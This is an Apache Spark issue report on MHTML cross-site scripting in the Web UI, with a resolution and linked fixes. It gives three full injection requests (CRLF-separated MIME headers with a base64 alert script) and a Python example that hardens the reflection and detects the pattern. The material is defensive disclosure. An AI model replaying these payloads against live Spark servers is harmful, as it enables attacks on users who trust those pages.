Spark / SPARK-20393

Strengthen Spark to prevent XSS vulnerabilities

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 1.5.2, 2.0.2, 2.1.0
    • Fix Version/s: 2.1.2, 2.2.0
    • Component/s: Web UI

      Description

      Using IBM Security AppScan Standard, we discovered several easy-to-recreate MHTML cross-site scripting vulnerabilities in the Apache Spark Web GUI application, and these vulnerabilities were found to exist in Spark versions 1.5.2 and 2.0.2, the two levels we initially tested. A cross-site scripting attack is not really an attack on the Spark server as much as an attack on the end user, taking advantage of their trust in the Spark server to get them to click on a URL like the ones in the examples below. So whether the user could or could not change lots of stuff on the Spark server is not the key point. It is an attack on the user themselves. If they click the link the script could run in their browser and compromise their device. Once the browser is compromised it could submit Spark requests, but it also might not.

      https://blogs.technet.microsoft.com/srd/2011/01/28/more-information-about-the-mhtml-script-injection-vulnerability/

      Request: GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a HTTP/1.1

      Excerpt from response: <div class="row-fluid">No running application with ID Content-Type: multipart/related;
      boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+
      </div>

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      Request: GET /history/app-20161012202114-0038/stages/stage?id=1&attempt=0&task.sort=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&task.pageSize=100 HTTP/1.1

      Excerpt from response: Content-Type: multipart/related;
      boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      Request: GET /log?appId=app-20170113131903-0000&executorId=0&logType=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a&byteLength=0 HTTP/1.1

      Excerpt from response: ==== Bytes 0-0 of 0 of /u/nmarion/Spark_2.0.2.0/Spark-DK/work/app-20170113131903-0000/0/Content-Type: multipart/related; boundary=_AppScan
      --_AppScan
      Content-Location:foo
      Content-Transfer-Encoding:base64
      PGh0bWw+PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw+

      Result: In the above payload the BASE64 data decodes as:
      <html><script>alert("XSS")</script></html>

      security@apache was notified and recommended a PR.
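      The three requests above share one shape: a query parameter (appId, task.sort, logType) is reflected into the page body unchanged, so the injected CR/LF-separated MIME headers and the base64 body reach the client exactly as sent. What follows is an added example, not Spark's code and not the fix from the pull requests linked below. It shows the unescaped reflection beside a hardened one that removes CR/LF and HTML-escapes the value, and a detection helper that recovers the base64 payload from a request parameter or a response body. The first request from the report is embedded as a constructed sample; the helper names (query_param, render_unescaped, render_hardened, sanitize_param, find_mhtml_payload) are this example's own.

```python
"""Reflected-parameter hardening and detection for the MHTML XSS pattern above.

Added example, not Spark's code. The request line below is the first one from
the report, embedded as a constructed sample so the script runs offline. The
helper names are this example's own, not Spark APIs.
"""
import base64
import html
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the first request from the report, as a single request line.
REPORTED_REQUEST = (
    "GET /app/?appId=Content-Type:%20multipart/related;%20boundary=_AppScan%0d%0a"
    "--_AppScan%0d%0aContent-Location:foo%0d%0aContent-Transfer-Encoding:base64"
    "%0d%0a%0d%0aPGh0bWw%2bPHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD48L2h0bWw%2b%0d%0a"
    " HTTP/1.1"
)


def query_param(request_line, name):
    """Return the URL-decoded value of one query parameter from a request line.

    Splits only on '&' so the ';' inside 'multipart/related;' stays in the value
    (urllib.parse.parse_qs treated ';' as a separator on older Pythons).
    """
    target = request_line.split(" ")[1]
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


# The page fragment the report's first response excerpt shows.
_TEMPLATE = '<div class="row-fluid">No running application with ID {}</div>'


def render_unescaped(app_id):
    """Vulnerable form: the parameter is concatenated straight into the page, so
    the CRLF-separated MIME headers and base64 body are echoed to the client."""
    return _TEMPLATE.format(app_id)


_CRLF = re.compile(r"[\r\n]")


def sanitize_param(value):
    """Drop CR/LF (the MIME header and boundary lines depend on them), then
    HTML-escape so <, >, &, and quotes cannot open tags or attributes."""
    return html.escape(_CRLF.sub("", value), quote=True)


def render_hardened(app_id):
    """Hardened form: same template, sanitized parameter."""
    return _TEMPLATE.format(sanitize_param(app_id))


_MHTML_HEADER = re.compile(r"multipart/related;.*?boundary=\S+", re.I | re.S)
_B64_BODY = re.compile(
    r"Content-Transfer-Encoding:\s*base64\r?\n\r?\n([A-Za-z0-9+/=]+)", re.I)


def find_mhtml_payload(text):
    """Detection helper for a request parameter, log entry or response body.

    If the text carries an MHTML part (multipart/related header plus a base64
    body after a blank line), return the decoded body; otherwise return None.
    """
    if not _MHTML_HEADER.search(text):
        return None
    body = _B64_BODY.search(text)
    if not body:
        return None
    try:
        return base64.b64decode(body.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


if __name__ == "__main__":
    param = query_param(REPORTED_REQUEST, "appId")
    print("decoded parameter:", repr(param))
    print("payload hidden in base64:", find_mhtml_payload(param))
    print("unescaped response still carries it:",
          find_mhtml_payload(render_unescaped(param)) is not None)
    print("hardened response carries it:",
          find_mhtml_payload(render_hardened(param)) is not None)
```

      HTML-escaping on its own leaves the newline-separated MIME structure in place, which is why the hardened path removes CR and LF before escaping. Run find_mhtml_payload over proxy captures or access-log query strings to flag the same pattern; the telltale pair is `multipart/related` followed by an encoded CRLF in a parameter value.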


          Activity

          apachespark Apache Spark added a comment -

          User 'ambauma' has created a pull request for this issue:
          https://github.com/apache/spark/pull/19538

          apachespark Apache Spark added a comment -

          User 'ambauma' has created a pull request for this issue:
          https://github.com/apache/spark/pull/19528

          srowen Sean Owen added a comment -

          Issue resolved by pull request 17686
          https://github.com/apache/spark/pull/17686

          apachespark Apache Spark added a comment -

          User 'n-marion' has created a pull request for this issue:
          https://github.com/apache/spark/pull/17686


            People

            • Assignee: Nicholas Marion (nmarion)
            • Reporter: Nicholas Marion (nmarion)
            • Votes: 0
            • Watchers: 5
